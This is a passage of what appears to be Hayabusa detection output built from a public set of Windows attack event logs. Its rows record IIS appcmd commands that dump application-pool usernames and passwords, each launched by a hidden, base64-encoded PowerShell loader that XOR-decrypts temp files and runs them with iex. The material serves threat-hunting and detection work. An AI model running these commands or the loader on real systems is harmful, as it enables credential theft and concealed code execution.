AKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: 